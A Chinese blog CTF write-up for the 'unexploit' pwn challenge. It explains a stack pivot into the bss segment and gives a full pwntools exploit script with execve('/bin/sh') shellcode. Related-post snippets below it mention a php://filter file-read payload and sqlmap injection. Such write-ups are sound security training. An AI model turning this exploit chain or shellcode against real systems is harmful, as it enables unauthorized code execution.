pwn 安恒月赛unexploit

最新推荐文章于 2021-01-03 09:17:48 发布
最新推荐文章于 2021-01-03 09:17:48 发布
阅读量344 收藏
点赞数
分类专栏: 题目 文章标签: pwn 安恒月赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/101838007
版权

直接进入主函数查看
在这里插入图片描述
可以供我们溢出的空间很少这里就要涉及到栈迁移了需要用到寄存器ebp,esp指令leave;ret

leave==mov esp,ebp;pop ebp
ret ==pop eip

我们能控制执行流然后继续跳入read函数因为read的读入位置是和ebp有关的所以可以控制栈的位置
在这里插入图片描述
所以我们先将ebp置为bss-0x8
然后跳到read读入的数据会到bss段然后将bss+0x8置为ebp我们先将剩余的8个可输入位填充为‘a’然后再跳入read函数栈段就会前面的8个a也是栈属于栈段了我们就可以置ebp为bss+0x16然后我们就可以输入24个的shellcode也就是在RIP的位置
还真是绕下次我把调试的给放出来
exp:

#coding:utf-8
#name:doudou
from pwn import *
elf=ELF('./unexploit')
p=process('./unexploit')
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
def debug():
	pwnlib.gdb.attach(p)
	pause()
offset=8
payload='a'*offset
payload+=p64(elf.bss()-0x8)
payload+=p64(0x40068A)
#debug()
p.send(payload)
payload='a'*offset
payload+=p64(elf.bss()+0x8) #ebp=elf.bss()
payload+=p64(0x40068A)
payload+='a'*8 #in stack 
sleep(0.2)
#debug()
p.send(payload)
payload=p64(0x601058)
payload += "\x48\x31\xf6\x56\x48\xbf"
payload +="\x2f\x62\x69\x6e\x2f"
payload += "\x2f\x73\x68\x57\x54"
payload += "\x5f\xb0\x3b\x99\x0f\x05"
sleep(0.2)
#debug()
p.send(payload)

p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
安恒杯 7月赛PWN-unexploit 经验总结
qq_43189757的博客
07-16 871
通过这题发现自己的有很多知识点短板 解题思路: read函数读取的缓冲区在 rbp-buf 也就是rbp - 0x8 处,那么控制了rbp的值指向我们可以写的区域(比如bss段)就可以在那个区域植入shellcode,再控制ret跳转到shellcode的地址就可以getshell了 具体做法: 把栈段切换到bss段,也就是让bss成为栈段 开始进行溢出的时先把rbp的值覆盖为 bss_addr...
2018 -12月份 安恒月赛 pwn
Maxmalloc的博客
12-23 1438
Messageb0x $ file messageb0x messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74...
DASCTF 2020安恒月赛 4月 pwn1---echo server题解
qy201706的博客
05-08 1002
学到了利用printf泄露libc,以前都只会puts… 0x1 checksec: 0x2 拖进ida: 显然进入sub_4006A7(): 厉害了自定义写入长度,明显的栈溢出 0x88个’a’可覆盖返回地址: 0x3 无system、’/bin/sh’ 泄露libc来做 0x4 printf泄露地址的详解(选择泄露__libc_start_main): 不知道ROP链怎么写,直接去程序里找汇编代码现学!! 发现程序最后的printf(“hello %s”, &s); 到g
2018 6月安恒杯月赛
weixin_40423072的博客
09-03 1822
更一下比赛的 解析吧。安恒杯的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
你了解函数调用过程吗?
一个程序员的修炼之路
01-03 757
函数调用是编程语言都有的概念,也许你听说过函数调用栈,但是大家都知道函数调用是如何完成的吗?我们为什么要了解这个过程: 对于程序运行机制中的数据结构和实现的了解,对自己开发程序有着启发作用 碰到一些疑难杂症的时候,比如函数栈溢出了或者函数栈破坏了,如何从蛛丝马迹中寻找问题的原因。 了解栈溢出可能带来的危害,黑客也许会利用栈溢出的漏洞进行攻击。 这篇博文我们一起来对函数调用的过程进行探究。 程序样例 下面是这篇博文要用到的一个样例程序:程序在main中调用了FunAdd函数。本篇就先来研究一下: 函数的
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
pwn-messageb0x-学习笔记
小龙在线
08-27 464
messageb0x是一个32位的ELF文件,用IDA打开: F5反编译: 关键在于process_info这个函数: v1的输入字符200(0xC8)限制明显大于栈的ebp的58h,所以存在溢出漏洞。 然后Shift+F12查看字符串,看有没有特殊字符串(system),没有: 可以利用 查找libc版本和system的偏移: 攻击脚本: from pwn import * elf = ELF('./messageb0x') sh = process('./messageb0x') puts
安恒月赛WriteUp-2018.12
BlusKing
12-22 2855
安恒月赛WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  <?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
2018 - 安恒杯 - babypie [stack partial overwrite]
ACdream
02-13 1219
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
安恒月赛writeup 2018年12月
SsMing的博客
12-23 1439
目录 misc1 misc2(签到) misc3 (学习资料) misc4(JUJU) web1 web2 pwn1 misc和web,和一道pwn misc1 看提示想到去下当时泄露的库 然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包 解压后得到个动图,记录上面的数字得到236855282761588523...
2018护网杯pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1268
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
安恒杯学到的新姿势
qq_39607945的博客
09-13 319
新闻搜索 考点:POST注入 工具:BP、sqlmap 本题考查POST注入,一般的注入是GET型的,当用POST表单传参数的时候就不能起效,此时需要进行POST注入。 而在本题中,通过截取请求包,然后利用sqlmap命令sqlmap -r 文件名 -D news --dump,news是本题中的数据库名。 即可完成注入。 常规操作 考点:文件上传、phar://漏洞 打开页面之后发现: 提示了...
C语言函数调用约定
孟源的专栏
11-06 698
导读:   转载自:馨荣家园blog   在C语言中,假设我们有这样的一个函数:   int function(int a,int b)   调用时只要用result = function(1,2)这样的方式就可以使用这个函数。但是,当高级语言被编译成计算机可以识别的机器码时,有一个问题就凸现出来:在CPU中,计算机没有办法知道一个函数调用需要多少个、什么样的参数,也没有硬件可以保存这些参数。也就
安恒 12月 pwn ----messageb0x
qq_42192672的博客
12-24 718
这次安恒就看了pwn题,第二个是orange,还不会,就做了下第一个 总体就是个简单的rop,但是有个坑就是题目让我们猜libc的版本到底是啥 然后我在IDA里看到了一个字符串 被坑惨了,在2.27调试了半天后来发现是2.23的,哭了 #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal...
xctf ics-05 wp
doudoudedi
06-18 2686
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
buuctf pwn
最新发布
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值